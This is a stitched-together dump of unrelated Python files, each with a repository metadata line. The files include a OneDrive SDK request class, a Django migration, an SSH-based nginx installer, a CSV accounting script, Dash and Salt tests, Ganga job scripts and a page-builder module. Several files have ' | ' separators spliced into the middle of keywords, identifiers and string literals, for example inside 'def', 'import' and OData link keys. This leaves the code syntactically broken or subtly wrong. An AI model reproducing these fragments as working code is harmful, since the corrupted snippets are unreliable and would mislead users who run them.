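    out.write(data)
    blocks = io.BytesIO()
    out.write_block_stream(blocks)
    blocks.seek(0)
    assert HashedBlockIO(block_stream=blocks).read() == data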
OneDrive/onedrive-sdk-python | src/python2/request/item_request.py | Python | mit | 3,549 | 0.003663 | # -*- coding: utf-8 -*-
'''
# Copyright (c) Microsoft Corporation. All Rights Reserved. Licensed under the MIT License. See License in the project root for license information.
#
# This file was generated and any changes will be overwritten.
'''
from ..request_base import RequestBase
from ..model.item import Item
import json
class ItemRequest(RequestBase):
"""The type ItemRequest."""
def __init__(self, request_url, client, options):
"""Constructs a new ItemRequest.
Args:
request_url (str): The url to perform the ItemRequest
on
client (:class:`OneDriveClient<onedrivesdk.request.one_drive_client.OneDriveClient>`):
The client which will be used for the request
options (list of :class:`Option<onedrivesdk.options.Option>`):
A list of options to pass into the request
"""
super(ItemRequest, self).__init__(request_url, client, options)
def delete(self):
"""Deletes the specified Item."""
self.method = "DELETE"
self.send()
def get(self):
"""Gets the specified Item.
Returns:
:class:`Item<onedrivesdk.model.item.Item>`:
The Item.
"""
self.method = "GET"
entity = Item(json.loads(self.send().content))
self._initialize_collection_properties(entity)
return entity
def update(self, item):
"""Updates the specified Item.
Args:
item (:class:`Item<onedrivesdk.model.item.Item>`):
The Item to update.
Returns:
:class:`Item<onedrivesdk.model.item.Item>`:
The updated Item.
"""
self.content_type = "application/json"
self.method = "PATCH"
entity = Item(json.loads(self.send(item).content))
self._initialize_collection_properties(entity)
return entity
def _initialize_collection_properties(self, value):
if value and value._prop_dict:
if value.permissions:
if "permissions@odata.nextLink" in value._prop_dict:
next_page_link = value._prop_dict["permissions@odata.nextLink"]
value.permissions._next_page_link = next_page_link
if value.subscriptions:
if "subscriptions@odata.nextLink" in value._prop_dict:
next_page_link = value._prop_dict["subscriptions@odata.nextLink"]
value.subscriptions._next_page_link = next_page_link
if value.versions:
if "versions@odata.nextLink" in value._prop_dict:
next_page_link = value._prop_dict["versions@odata.nextLink"]
value.versions._next_page_link = next_page_link
if value.children:
if " | children@odata.nextLink" in value._prop_dict:
next_page_link = value._prop_dict["children@odata.nextLink"]
value.children._next_page_link = next_page_link
if value.tags:
if "tags@odata.nextLink" in value._prop_dict:
next_page_link = value._prop_dict["tags@odata.next | Link"]
value.tags._next_page_link = next_page_link
if value.thumbnails:
if "thumbnails@odata.nextLink" in value._prop_dict:
next_page_link = value._prop_dict["thumbnails@odata.nextLink"]
value.thumbnails._next_page_link = next_page_link
|
mogria/rtsh | srv/model/unitfactory.py | Python | gpl-2.0 | 546 | 0.005495 | from model.commonfactory import CommonFactory
from model.slaveunit import SlaveUnit
from model.squireunit import SquireUnit
from model.swordfighterunit import SwordfighterUnit
from model.archerunit import ArcherUnit
from model.cavalryunit import CavalryUnit
UNIT_TYPES = {
'slave': SlaveUnit,
'squire': SquireUnit,
'swordfighter': SwordfighterUnit,
'archer': ArcherUnit,
'cavalry': CavalryUnit
}
def UnitFactory(unit_type = "none", *args, **kwargs):
return | CommonFactory("unit", unit_type, UNIT_TYPES, *args, **kwargs)
|
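# Hypothetical usage (CommonFactory's signature is defined elsewhere): the
# string key selects a class from UNIT_TYPES, and the remaining arguments
# are presumably forwarded to that class's constructor, e.g.
#     archer = UnitFactory("archer")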
tsmrachel/remo | remo/profiles/migrations/0003_auto_20160921_1608.py | Python | bsd-3-clause | 610 | 0 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
def forwards(apps, schema_editor):
"""Create Peers group."""
Group = apps.get_model('auth', 'Group')
Group.objects.create(name='Peers')
def backwards(apps, schema_editor):
"""Delete Peers group."""
Group = apps.get_model('auth', 'Group')
Group.objects.filter(name='Peers').delete()
class Migration(migrations.Migration):
dependencies = [
('profiles', '0002_auto_20160908_1534'),
]
operations = [
migrations.RunPython(forwards, backwards)
]
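    # Editorial note: pairing forwards/backwards in RunPython keeps this
    # migration reversible; migrating this app back one step runs backwards()
    # and deletes the Peers group again.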
|
skarphed/skarphed | admin/installer/debian7_nginx/__init__.py | Python | agpl-3.0 | 6,232 | 0.011555 | #!/usr/bin/python
#-*- coding: utf-8 -*-
###########################################################
# © 2011 Daniel 'grindhold' Brendle and Team
#
# This file is part of Skarphed.
#
# Skarphed is free software: you can redistribute it and/or
# modify it under the terms of the GNU Affero General Public License
# as published by the Free Software Foundation, either
# version 3 of the License, or (at your option) any later
# version.
#
# Skarphed is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied
# warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
# PURPOSE. See the GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public
# License along with Skarphed.
# If not, see http://www.gnu.org/licenses/.
###########################################################
import os
import gobject
import json
import shutil
import tarfile
from glue.paths import INSTALLER
from data.skarphed.Skarphed import AbstractInstaller, AbstractDestroyer
from glue.lng import _
from glue.paths import COREFILES
import logging
TARGETNAME = "Debian 7 / nginx"
EXTRA_PARAMS = {
'nginx.domain':(_('Domain'),_('example.org or leave empty')),
'nginx.subdomain':(_('Subdomain'),_('sub.example.org or leave empty')),
'nginx.port':(_('Port'),_('80'))
}
class Installer(AbstractInstaller):
def execute_installation(self):
os.mkdir(self.BUILDPATH)
p = os.path.dirname(os.path.realpath(__file__))
nginx_template = open(os.path.join(p,"nginx.conf"),"r").read()
nginx_domain = ""
domainlineterm = ""
if self.data['nginx.port'] == "":
self.data['nginx.port'] = "80"
if self.data['nginx.domain'] != "":
nginx_domain = "server_name "+self.data['nginx.domain']
self.domain = self.data['nginx.domain']
domainlineterm = ";"
nginx_subdomain = ""
if self.data['nginx.subdomain'] != "":
nginx_subdomain = "alias "+self.data['nginx.subdomain']
domainlineterm = ";"
nginxconf = nginx_template%{'port':self.data['nginx.port'],
'domain':nginx_domain,
                                    'subdomain':nginx_subdomain,
'domainlineterm':domainlineterm}
nginxconfresult = open(os.path.join(self.BUILDPATH,"nginx.conf"),"w")
nginxconfresult.write(nginxconf)
nginxconfresult.close()
self.status = 10
| gobject.idle_add(self.updated)
scv_config = {}
for key,val in self.data.items():
if key.startswith("core.") or key.startswith("db."):
if key == "db.name":
scv_config[key] = val+".fdb"
continue
scv_config[key] = val
scv_config_defaults = {
"core.session_duration":2,
"core.session_extend":1,
"core.cookielaw":1,
"core.debug":True
}
scv_config.update(scv_config_defaults)
jenc = json.JSONEncoder()
config_json = open(os.path.join(self.BUILDPATH,"config.json"),"w")
config_json.write(jenc.encode(scv_config))
config_json.close()
shutil.copyfile(os.path.join(p,"skarphed.conf"), os.path.join(self.BUILDPATH,"skarphed.conf"))
shutil.copyfile(os.path.join(p,"install.sh"), os.path.join(self.BUILDPATH,"install.sh"))
shutil.copyfile(os.path.join(p,"uwsgi.conf"), os.path.join(self.BUILDPATH,"uwsgi.conf"))
self.status = 30
gobject.idle_add(self.updated)
shutil.copytree(os.path.join(COREFILES,"web"), os.path.join(self.BUILDPATH, "web"))
shutil.copytree(os.path.join(COREFILES,"lib"), os.path.join(self.BUILDPATH,"lib"))
tar = tarfile.open(os.path.join(self.BUILDPATH,"scv_install.tar.gz"),"w:gz")
tar.add(os.path.join(self.BUILDPATH,"nginx.conf"))
tar.add(os.path.join(self.BUILDPATH,"uwsgi.conf"))
tar.add(os.path.join(self.BUILDPATH,"config.json"))
tar.add(os.path.join(self.BUILDPATH,"skarphed.conf"))
tar.add(os.path.join(self.BUILDPATH,"install.sh"))
tar.add(os.path.join(self.BUILDPATH,"web"))
tar.add(os.path.join(self.BUILDPATH,"lib"))
tar.close()
self.status = 45
gobject.idle_add(self.updated)
con = self.server.getSSH()
con_stdin, con_stdout, con_stderr = con.exec_command("mkdir /tmp/scvinst"+str(self.installationId))
self.status = 50
gobject.idle_add(self.updated)
con = self.server.getSSH()
ftp = con.open_sftp()
ftp.put(os.path.join(self.BUILDPATH,"scv_install.tar.gz"),"/tmp/scvinst"+str(self.installationId)+"/scv_install.tar.gz")
ftp.close()
self.status = 65
gobject.idle_add(self.updated)
con = self.server.getSSH()
con_stdin, con_stdout, con_stderr = con.exec_command("cd /tmp/scvinst"+str(self.installationId)+"; tar xvfz scv_install.tar.gz -C / ; chmod 755 install.sh ; ./install.sh ")
output = con_stdout.read()
logging.debug("SSH-outputlength: %d"%len(output))
logging.debug(output)
shutil.rmtree(self.BUILDPATH)
self.status = 100
gobject.idle_add(self.updated)
gobject.idle_add(self.addInstanceToServer)
class Destroyer(AbstractDestroyer):
def execute_destruction(self):
p = os.path.dirname(os.path.realpath(__file__))
server = self.instance.getServer()
self.status = 10
gobject.idle_add(self.updated)
con = server.getSSH()
ftp = con.open_sftp()
ftp.put(os.path.join(p,"teardown.sh"),"/tmp/teardown.sh")
ftp.close()
self.status = 30
gobject.idle_add(self.updated)
con = server.getSSH()
con_stdin, con_stdout, con_stderr = con.exec_command("cd /tmp/ ; chmod 755 teardown.sh ; ./teardown.sh %d "%self.instanceid)
logging.debug(con_stdout.read())
self.status = 100
gobject.idle_add(self.updated)
gobject.idle_add(self.updated)
gobject.idle_add(self.removeInstanceFromServer)
|
JeffAbrahamson/UNA_compta | ha_transfer.py | Python | gpl-3.0 | 2,996 | 0.002004 | #!/usr/bin/python3
"""Sum helloasso CSV file for certain accounts.
Used for computing balance transfers to the next fiscal year.
"""
import argparse
import dateutil.parser as dp
import pandas as pd
import sys
from tabulate import tabulate
# We have several get_data() functions, as the format changes slightly
# from campaign to campaign. The dataframe that they each return should
# be the same format.
def get_account_mappings(config_filename):
"""Get the mapping from helloasso descriptions to accounts.
This is a python-format config file in the form of a dict, each of
whose keys corresponds to a description value in the import file.
The values are dicts, one key is "default" and,if present,
represents the default account for that description. The other
key is "subdescr" with value a dict mapping subaccount
descriptions to accounts.
| """
with open(config_filename, 'r') as config_fp:
config = eval(config_fp.read())
return config
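# Illustrative config shape (hypothetical description and account values):
#     {
#         "Adhesion 2020": {"default": "756",
#                           "subdescr": {"Couple": "756100"}},
#     }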
def find_account(config, descr, sub_descr):
if descr not in config:
return 'ignore'
descr_account = config[descr]
    if 'subdescr' in descr_account and sub_descr in descr_account['subdescr']:
return descr_account['subdescr'][sub_descr]
if 'default' in descr_account:
return descr_account['default']
return 'ignore'
def make_find_account(config):
def this_find_account(row):
        ret = find_account(config, row['description'], row['sub_description'])
return ret
return this_find_account
def get_data(infile, config):
"""Read dataframe from CSV file and return view.
"""
data = pd.read_csv(
infile,
sep=';',
)
data['amount'] = pd.Series(
[float(s.replace(',', '.'))
for s
in data['Montant']])
data['description'] = pd.Series(
[val.strip()
for val
in data.Campagne])
data['sub_description'] = pd.Series(
[str(val).strip()
for val
in data.Désignation])
# This sometimes needs to be customised to be a switch
# on data.Formule.
this_find_account = make_find_account(config)
data['account'] = data.apply(this_find_account, axis=1)
data_valid = data[data['Statut'] == 'Validé']
data_view = data_valid[['description', 'sub_description',
'amount', 'account']]
return data_view.groupby(['account']).sum()
def main():
"""Do what we do.
"""
parser = argparse.ArgumentParser()
parser.add_argument('--infile', type=str, required=True,
help='Name of file to read')
parser.add_argument('--config', type=str, required=True,
help='config file mapping descriptions to accounts')
args = parser.parse_args()
config = get_account_mappings(args.config)
data_view = get_data(args.infile, config)
print(data_view)
return 0
if __name__ == '__main__':
retval = main()
sys.exit(retval)
|
aaalgo/owl | annotate/management/commands/import.py | Python | bsd-2-clause | 1,100 | 0.009091 | import sys
from optparse import make_option
from django.core.management.base import BaseCommand, CommandError
from django.db import IntegrityError, transaction
from django.contrib.auth.models import User
from annotate.models import *
class Command(BaseCommand):
d | ef add_arguments(self, parser):
parser.add_argument('--run', action='store_true', default=False, help='')
pass
@transaction.atomic
def handle(self, *args, **options):
#hours = options['hours'] + 24 * options['days']
#check_and_import(hours, not options['run'], options['check'])
run = options['run']
for line in sys.stdin:
fs = line.strip().split('\t')
if len(fs) == 1:
path = fs[0]
meta = path
elif len(fs) == 2:
path, meta = fs
else:
raise Exception("bad line: %s" % line)
if run:
Image.objects.create(path = path, meta = meta)
else:
print(path, meta)
pass
pass
pass
|
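# Usage sketch (illustrative paths): each stdin line is "path" or
# "path<TAB>meta"; without --run the command only prints what it would
# create, e.g.
#     printf 'images/a.jpg\t{"label": 1}\n' | ./manage.py import --run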
plotly/dash | components/dash-core-components/tests/integration/input/test_input_and_state.py | Python | mit | 1,787 | 0 | import time
from multiprocessing import Value
from dash import Dash, Input, Output, State, dcc, html
import dash.testing.wait as wait
def test_state_and_inputs(dash_dcc):
app = Dash(__name__)
app.layout = html.Div(
[
dcc.Input(value="Initial Input", id="input"),
dcc.Input(value="Initial State", id="state"),
html.Div(id="output"),
]
)
call_count = Value("i", 0)
@app.callback(
Output("output", "children"),
inputs=[Input("input", "value")],
state=[State("state", "value")],
)
def update_output(input, state):
call_count.value += 1
return 'input="{}", state="{}"'.format(input, state)
dash_dcc.start_server(app)
input_ = dash_dcc.find_element("#input")
    # callback gets called with initial input
wait.until(lambda: call_count.value == 1, timeout=1)
assert dash_dcc.wait_for_text_to_equal(
"#output", 'input="Initial Input", state="Initial State"'
)
input_.send_keys("x")
wait.until(lambda: call_count.value == 2, timeout=1)
assert dash_dcc.wait_for_text_to_equal(
"#output", 'input="Initial Inputx", state="Initial State"'
)
dash_dcc.find_element("#state").send_keys("x")
time.sleep(0.2)
assert call_count.value == 2
    assert dash_dcc.wait_for_text_to_equal(
        "#output", 'input="Initial Inputx", state="Initial State"'
    ), "state value should not trigger callback"
input_.send_keys("y")
wait.until(lambda: call_count.value == 3, timeout=1)
assert dash_dcc.wait_for_text_to_equal(
"#output", 'input="Initial Inputxy", state="Initial Statex"'
), "input value triggers callback, and the last state change is kept"
assert dash_dcc.get_logs() == []
|
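# Editorial sketch (not exercised by the test runner): a minimal standalone
# app with the same Input/State split. Only the button's n_clicks is an
# Input, so typing in the box never fires the callback by itself.
def _example_input_state_app():
    app = Dash(__name__)
    app.layout = html.Div(
        [
            html.Button("go", id="btn"),
            dcc.Input(id="box", value=""),
            html.Div(id="out"),
        ]
    )

    @app.callback(
        Output("out", "children"),
        Input("btn", "n_clicks"),
        State("box", "value"),
    )
    def show(n_clicks, value):
        return "clicked {}, box holds {!r}".format(n_clicks, value)

    return app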
Williams224/davinci-scripts | kstaretappipig/JobSubmit.py | Python | mit | 1,942 | 0.031411 | #!/usr/bin/env ganga
import getpass
from distutils.util import strtobool
polarity='MagDown'
datatype='MC'
substitution='None'
channel='11164031'
b=Job()
b.application=DaVinci(version="v36r5")
if datatype=='MC':
b.application.optsfile='NTupleMaker_{0}.py'.format(polarity)
if datatype=='Data':
if substitution=='None':
b.application.optsfile='DNTupleMaker.py'
if substitution=='PimforKm':
b.application.optsfile='DNTupleMaker_PimforKm.py'
b.outputfiles=[DiracFile('Output.root')]
b.inputdata = b.application.readInputData('{0}_12_{1}_{2}.py'.format(datatype,channel,polarity))
if substitution=='None':
b.comment='{0}_12_{1}_{2}'.format(datatype,polarity,channel)
if substitution=='PimforKm':
b.comment='{0}_12_{1}_{2}_{3}'.format(datatype,polarity,channel,substitution)
if datatype=='Data':
| b.splitter = SplitByFiles(filesPerJob=10)
if datatype=='MC':
b.splitter = SplitByFiles(filesPerJob=2)
#b.OutputSandbox=["stderr","stdout"]
b.backend=Dirac()
#b.submit()
queues.add(b.submit)
polarity='MagUp'
b2=Job()
b2.application=DaVinci(version="v36r5")
if datatype=='MC':
b2.application.optsfile='NTupleMaker_{0}.py'.format(polarity)
if datatype=='Data':
if substitution=='None':
        b2.application.optsfile='DNTupleMaker.py'
if substitution=='PimforKm':
b2.application.optsfile='DNTupleMaker_PimforKm.py'
b2.outputfiles=[DiracFile('Output.root')]
b2.inputdata = b2.application.readInputData('{0}_12_{1}_{2}.py'.format(datatype,channel,polarity))
if substitution=='None':
b2.comment='{0}_12_{1}_{2}'.format(datatype,polarity,channel)
if substitution=='PimforKm':
b2.comment='{0}_12_{1}_{2}_{3}'.format(datatype,polarity,channel,substitution)
if datatype=='Data':
b2.splitter = SplitByFiles(filesPerJob=10)
if datatype=='MC':
b2.splitter = SplitByFiles(filesPerJob=2)
#b.OutputSandbox=["stderr","stdout"]
b2.backend=Dirac()
#b.submit()
queues.add(b2.submit)
|
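# Editorial sketch (not in the original script): the duplicated MagDown and
# MagUp blocks above could be folded into a single loop, assuming the two
# jobs differ only by polarity (the substitution-specific comment variant is
# simplified here).
for polarity in ("MagDown", "MagUp"):
    j = Job()
    j.application = DaVinci(version="v36r5")
    if datatype == "MC":
        j.application.optsfile = "NTupleMaker_{0}.py".format(polarity)
    elif substitution == "None":
        j.application.optsfile = "DNTupleMaker.py"
    else:
        j.application.optsfile = "DNTupleMaker_PimforKm.py"
    j.outputfiles = [DiracFile("Output.root")]
    j.inputdata = j.application.readInputData(
        "{0}_12_{1}_{2}.py".format(datatype, channel, polarity))
    j.comment = "{0}_12_{1}_{2}".format(datatype, polarity, channel)
    j.splitter = SplitByFiles(filesPerJob=10 if datatype == "Data" else 2)
    j.backend = Dirac()
    queues.add(j.submit)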
athenajc/XideSDCC | ide/sim/sim_test_app.py | Python | gpl-2.0 | 5,140 | 0.018093 | import wx
import random
from sim_scope import ScopePanelList
#----------------------------------------------------------------------------------
class TestSim():
def __init__(self):
self.time_stamp = 0
self.pin_logs = {}
self.pins = ['RA0','RA1','RA2','RA3','RA4','RA5','RA6','RA7',
'RB0','RB1','RB2','RB3','RB4','RB5','RB6','RB7',
'RC0','RC1','RC2','RC3','RC4','RC5','RC6','RC7',]
self.pin_out = []
p = | self.pin_logs
for i in range(8):
s = 'RB' + str(i)
p[s] = []
self.pin_out.append(s)
#p['RB0'] = [1,2,4,8,0x10,0x20,0x40,0x80,0xff, 0x11, 0x61]
#p['RB1'] = [0x11, 0x22, 0x33, 0x44, 0x55]
#p['RB2'] = [0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15]
    #---------------------------------------------------------------
def get_pin_log(self, pin):
log = self.pin_logs.get(pin, [])
return log
#---------------------------------------------------------------
def step(self):
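        # Each entry in a pin's log is [edge_time, previous_edge_time, bit],
        # newest first; a new entry is prepended only when the freshly drawn
        # random bit differs from the last recorded level.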
time = self.time_stamp
for i in range(8):
bit = random.randint(0,1)
s = 'RB' + str(i)
lst = self.pin_logs[s]
if lst == []:
t = []
b0 = 0
t0 = 0
else:
t = lst[0]
b0 = t[2]
t0 = t[0]
if bit != b0:
lst.insert(0, [time, t0, bit])
#for name, lst in self.pin_logs.items():
# lst.append(random.randint(0,256))
self.time_stamp += 4 * 1024
#----------------------------------------------------------------------------------
class TestSliderPanel(wx.Panel):
def __init__(self, parent):
wx.Panel.__init__(self, parent, -1)
self.count = 0
wx.StaticText(self, -1, "This is a wx.Slider.", (45, 15))
#"""
#__init__(self, Window parent, int id=-1, int value=0, int minValue=0,
#int maxValue=100, Point pos=DefaultPosition,
#Size size=DefaultSize, long style=SL_HORIZONTAL,
#Validator validator=DefaultValidator,
#String name=SliderNameStr) -> Slider
#"""
# id, value, min, max, pos, size, style
slider = wx.Slider(
self, -1, 25, 1, 100, (30, 60), (250, -1),
wx.SL_HORIZONTAL | wx.SL_AUTOTICKS | wx.SL_LABELS
)
slider.SetTickFreq(5, 1)
slider.Bind(wx.EVT_SCROLL_CHANGED, self.onChanged)
def onChanged(self, evt):
print('changed: %d' % evt.EventObject.GetValue())
#----------------------------------------------------------------------------------
class TestFrame1(wx.Frame):
def __init__(self, parent, title):
sz = wx.GetDisplaySize()
w = sz.GetWidth() * 3 / 4
h = sz.GetHeight() / 2
x = (sz.GetWidth() - w) / 2
y = (sz.GetHeight() - h) / 2
wx.Frame.__init__(self, parent, title=title, size=(w, h), pos=(x, 80),
style=wx.DEFAULT_FRAME_STYLE|wx.NO_FULL_REPAINT_ON_RESIZE)
self.SetMinSize(wx.Size(300,100))
self.sizer = wx.BoxSizer(wx.VERTICAL)
self.frame = self
p = TestSliderPanel(self)
self.sizer.Add(p, 1, wx.EXPAND)
self.SetSizer(self.sizer)
self.sizer.Layout()
#----------------------------------------------------------------------------------
class TestFrame(wx.Frame):
def __init__(self, parent, title):
sz = wx.GetDisplaySize()
w = sz.GetWidth() * 3 / 4
h = sz.GetHeight() / 2
x = (sz.GetWidth() - w) / 2
y = (sz.GetHeight() - h) / 2
wx.Frame.__init__(self, parent, title=title, size=(w, h), pos=(x, 80),
style=wx.DEFAULT_FRAME_STYLE|wx.NO_FULL_REPAINT_ON_RESIZE)
self.SetMinSize(wx.Size(300,100))
self.sizer = wx.BoxSizer(wx.VERTICAL)
self.frame = self
self.sim = TestSim()
self.scope = p = ScopePanelList(self, self.sim)
self.sizer.Add(p, 1, wx.EXPAND)
self.SetSizer(self.sizer)
self.sizer.Layout()
self.timer1 = wx.Timer(self)
self.Bind(wx.EVT_TIMER, self.OnTimer1Timer, self.timer1)
self.timer1.Start(100)
#-------------------------------------------------------------------
def OnTimer1Timer(self, event):
self.sim.step()
self.scope.update(self.sim)
#----------------------------------------------------------------------------------
class TestApp(wx.App):
def OnInit(self):
frame = TestFrame1(None, 'Test Frame')
self.SetTopWindow(frame)
frame.Show(True)
return True
def OnClose(self):
print 'TestApp onclose'
        return True
def t(v):
for bit in bin(v)[2:]:
print bit
#----------------------------------------------------------------------------------
if __name__ == '__main__':
app = TestApp(0)
app.MainLoop() |
saltstack/salt | tests/unit/utils/test_schema.py | Python | apache-2.0 | 94,904 | 0.001475 | # pylint: disable=function-redefined
import copy
import salt.utils.json
import salt.utils.schema as schema
import salt.utils.stringutils
import salt.utils.yaml
from salt.utils.versions import LooseVersion as _LooseVersion
from tests.support.unit import TestCase, skipIf
try:
import jsonschema
import jsonschema.exceptions
HAS_JSONSCHEMA = True
JSONSCHEMA_VERSION = _LooseVersion(jsonschema.__version__)
except ImportError:
HAS_JSONSCHEMA = False
JSONSCHEMA_VERSION = _LooseVersion("0")
# pylint: disable=unused-import
try:
import rfc3987
HAS_RFC3987 = True
except ImportError:
HAS_RFC3987 = False
try:
import strict_rfc3339
HAS_STRICT_RFC3339 = True
except ImportError:
HAS_STRICT_RFC3339 = False
# pylint: enable=unused-import
class ConfigTestCase(TestCase):
"""
TestCase for salt.utils.config module
"""
def test_configuration_subclass_inherits_items(self):
class BaseConfig(schema.Schema):
base = schema.BooleanItem(default=True, required=True)
class SubClassedConfig(BaseConfig):
hungry = schema.BooleanItem(
title="Hungry", description="Are you hungry?", required=True
)
self.assertDictEqual(
SubClassedConfig.serialize(),
{
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"base": {"default": True, "type": "boolean", "title": "base"},
"hungry": {
"type": "boolean",
"description": "Are you hungry?",
"title": "Hungry",
},
},
"required": ["base", "hungry"],
"x-ordering": ["base", "hungry"],
"additionalProperties": False,
},
)
class MergedConfigClass(schema.Schema):
thirsty = schema.BooleanItem(
title="Thirsty", description="Are you thirsty?", required=True
)
merge_subclassed = SubClassedConfig(flatten=True)
expected = {
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"thirsty": {
"type": "boolean",
"description": "Are you thirsty?",
"title": "Thirsty",
},
"base": {"default": True, "type": "boolean", "title": "base"},
"hungry": {
"type": "boolean",
"description": "Are you hungry?",
"title": "Hungry",
},
},
"required": ["thirsty", "base", "hungry"],
"x-ordering": ["thirsty", "base", "hungry"],
"additionalProperties": False,
}
self.assertDictContainsSubset(
MergedConfigClass.serialize()["properties"], expected["properties"]
)
self.assertDictContainsSubset(expected, MergedConfigClass.serialize())
def test_configuration_items_order(self):
class One(schema.Schema):
one = schema.BooleanItem()
class Three(schema.Schema):
three = schema.BooleanItem()
class Final(One):
two = schema.BooleanItem()
three = Three(flatten=True)
self.assertEqual(Final.serialize()["x-ordering"], ["one", "two", "three"])
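        # Illustrative aside (not one of the original assertions): the
        # serialized dict is plain JSON Schema, so it can be fed straight to
        # jsonschema, e.g.
        #     jsonschema.validate({"one": True, "two": False}, Final.serialize())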
def test_optional_requirements_config(self):
class BaseRequirements(schema.Schema):
driver = schema.StringItem(default="digitalocean", format="hidden")
class SSHKeyFileSchema(schema.Schema):
ssh_key_file = schema.StringItem(
title="SSH Private Key",
description=(
"The path to an SSH private key which will be used "
"to authenticate on the deployed VMs"
),
)
class SSHKeyNamesSchema(schema.Schema):
ssh_key_names = schema.StringItem(
title="SSH Key Names",
description=(
"The names of an SSH key being managed on "
"DigitalOcean account which will be used to "
"authenticate on the deployed VMs"
),
)
class Requirements(BaseRequirements):
title = "DigitalOcean"
description = "DigitalOcean Cloud VM configuration requirements."
personal_access_token = schema.StringItem(
title="Personal Access Token",
description=(
"This is the API access token which can be generated "
"under the API/Application on your account"
),
required=True,
)
requirements_definition = schema.AnyOfItem(
items=(
SSHKeyFileSchema.as_requirements_item(),
SSHKeyNamesSchema.as_requirements_item(),
),
)(flatten=True)
ssh_key_file = SSHKeyFileSchema(flatten=True)
ssh_key_names = SSHKeyNamesSchema(flatten=True)
expected = {
"$schema": "http://json-schema.org/draft-04/schema#",
"title": "DigitalOcean",
"description": "DigitalOcean Cloud VM configuration requirements.",
"type": "object",
"properties": {
"driver": {
"default": "digitalocean",
"format": "hidden",
"type": "string",
"title": "driver",
},
"personal_access_token": {
"type": "string",
"description": (
"This is the API access token which can be "
"generated under the API/Application on your account"
),
"title": "Personal Access Token",
},
"ssh_key_file": {
"type": "string",
"description": (
"The path to an SSH private key which will "
"be used to authenticate on the deployed VMs"
),
"title": "SSH Private Key",
},
"ssh_key_names": {
"type": "string",
"description": (
"The names of an SSH key being managed on DigitalOcean "
"account which will be used to authenticate on the deployed VMs"
),
"title": "SSH Key Names",
},
},
"anyOf": [{"required": ["ssh_key_file"]}, {"required": ["ssh_key_names"]}],
"required": ["personal_access_token"],
"x-ordering": [
"driver",
"personal_access_token",
"ssh_key_file",
"ssh_key_names",
],
"additionalProperties": False,
}
self.assertDictEqual(expected, Requirements.serialize())
class Requirements2(BaseRequirements):
title = "DigitalOcean"
description = "DigitalOcean Cloud VM configuration requirements."
personal_access_token = schema.StringItem(
| title="Personal Access Token",
description=(
"This is the API access token which can be generated "
"under the API/Application on your account"
),
required=True,
)
            ssh_key_file = schema.StringItem(
title="SSH Private Key",
description=(
"The path to an SSH private key which will be used "
"to authenticate on the deployed VMs"
),
)
ssh_key_names = schema.StringItem(
title="SSH Key Names",
description=(
|
tmthydvnprt/quilt | quilt/Quilter.py | Python | mit | 18,778 | 0.004047 | """
quilt.Quilter
Object to stitch a page based on quilt
{: .lead}
1. use [quilt file](#quiltfile) to create quilt
2. replace all [patch files](#patchfile) by matching `patch#id` tags in quilt with a `patch/id.html` file
3. parses [page file](#pagefile) using the following format:
1. `key: value` page variable *header* (optional)
* key = `[A-Za-z0-9_-]+` until `:`, value = a string per line (mulitlines become array) until next key
* page variable section ends with first empty (whitespace-only) line
2. `html` or `markdown` page content
3. `<script>` page script (optional)
4. set [page variables](#pagevars), overriding default site variables
5. add page content to quilt (auto processing [`markdown` page](#pagefilemd) if file ends with `.md` or `.markdown`)
6. add page script to the end of quilt
7. replace all brace variables, `{ {.*}}`, in content with page or site variables
8. if page is under `posts/` directory, `tags` and `categories` variables are linked and appended to page content
9. fill in blank `alt` attributes for `<a>` and `<img>` tags
project : quilt
version : 0.1.1
status : development
modifydate : 2015-05-13 07:09:00 -0700
createdate : 2015-04-28 06:02:00 -0700
website : https://github.com/tmthydvnprt/quilt
author : tmthydvnprt
email : tmthydvnprt@users.noreply.github.com
maintainer : tmthydvnprt
license : MIT
copyright : Copyright 2015, quilt
credits :
"""
import os
import bs4
import json
import copy
import time
import math
import shutil
from collections import defaultdict
from quilt.Constants import JS_HTML_PATTERN_RE, FIRST_KEY_RE, FIRST_EMPTY_LINE_RE, KEY_VALUE_RE, VALUE_RE, TRUE_RE
from quilt.Constants import PAGEVAR_RE, ESCAPED_PAGEVAR_RE
from quilt.Constants import PATCHCOMMENT, QUILTCOMMENT, PAGEOBJ, DOTSTAR_RE, PAGEVARS_TO_PRINT
from quilt.Util import write_file, relative_path, group_links, minimize_js, NO_EMPTY_TAGS
from quilt.Util import HEAD_STRAINER, BODY_STRAINER#, a_strainer, link_strainer, script_strainer, table_strainer, img_strainer
from quilt.Markdown import MD
DEBUG_FILE = ''
def add_suffix(filepath='', suffix=''):
"""add suffix to file name"""
dirname = os.path.dirname(filepath)
filename, ext = os.path.splitext(os.path.basename(filepath))
new_name = os.path.join(dirname, filename + suffix + ext)
    print 'debugging:', new_name
return new_name
def parse_pagevars(var_str=''):
"""parse page var string"""
page_vars = defaultdict(list)
key = None
value = None
if var_str:
# parse key, value pairs from each line
for line in var_str.split('\n'):
key_value = KEY_VALUE_RE.match(line)
if key_value:
key = key_value.group('key').strip()
value = key_value.group('value').strip()
page_vars[key].append(value)
else:
another_value = VALUE_RE.match(line)
if another_value and key:
page_vars[key].append(another_value.group('value').strip())
# reduce singleton arrays to string
for key, value in page_vars.items():
if len(value) == 1:
page_vars[key] = value[0]
return page_vars
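# Illustrative behaviour sketch (assuming VALUE_RE matches plain
# continuation lines, as the loop above implies):
#     parse_pagevars("title: Hello\ntags: a\n b\n")
#     -> {'title': 'Hello', 'tags': ['a', 'b']}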
class Quilter(object):
"""page quilter object"""
#@profile
def __init__(self, page_file='', quilt='', patches=None, page='', config=None, overrides=None, wrap=''):
"""create quilter"""
# set settings
self.config = config
self.post = self.config["buildblog"] and os.path.join(os.path.basename(self.config["posts"]), "") in page_file
self.__do_markdown = page_file[-3:] == '.md'
self.__wrap = wrap or self.__do_markdown
# set pagevars, handling some special cases
self.pagevars = copy.deepcopy(self.config["page_defaults"])
self.pagevars.update({
"rootpath" : self.config["output"],
"relativepath" : relative_path(
page_file.replace(self.config["pages"], self.config["output"]).replace('.md', '.html'), self.config["output"]
| ),
"source" : page_file,
"output" : page_file.replace(self.config["pages"], self.config["output"]).replace('.md', '.html'),
